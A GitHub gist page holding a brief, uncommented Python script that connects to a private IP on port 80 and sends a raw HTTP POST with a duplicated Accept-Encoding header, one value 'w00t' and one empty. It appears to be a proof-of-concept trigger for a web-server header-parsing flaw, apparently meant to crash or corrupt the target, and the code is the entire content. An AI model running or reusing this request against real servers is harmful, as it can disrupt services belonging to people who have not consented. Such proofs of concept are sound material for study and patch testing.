Last active
June 5, 2021 15:51
-
-
Save hugsy/6373479713103289c012286e7f401fc1 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3.9 | |
import socket | |
s = socket.socket() | |
s.connect( ("192.168.57.99", 80) ) | |
s.send(b"""POST / HTTP/1.1\r | |
Host: 192.168.57.99\r | |
Accept-Encoding: w00t\r | |
Accept-Encoding: \r | |
\r\n""") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment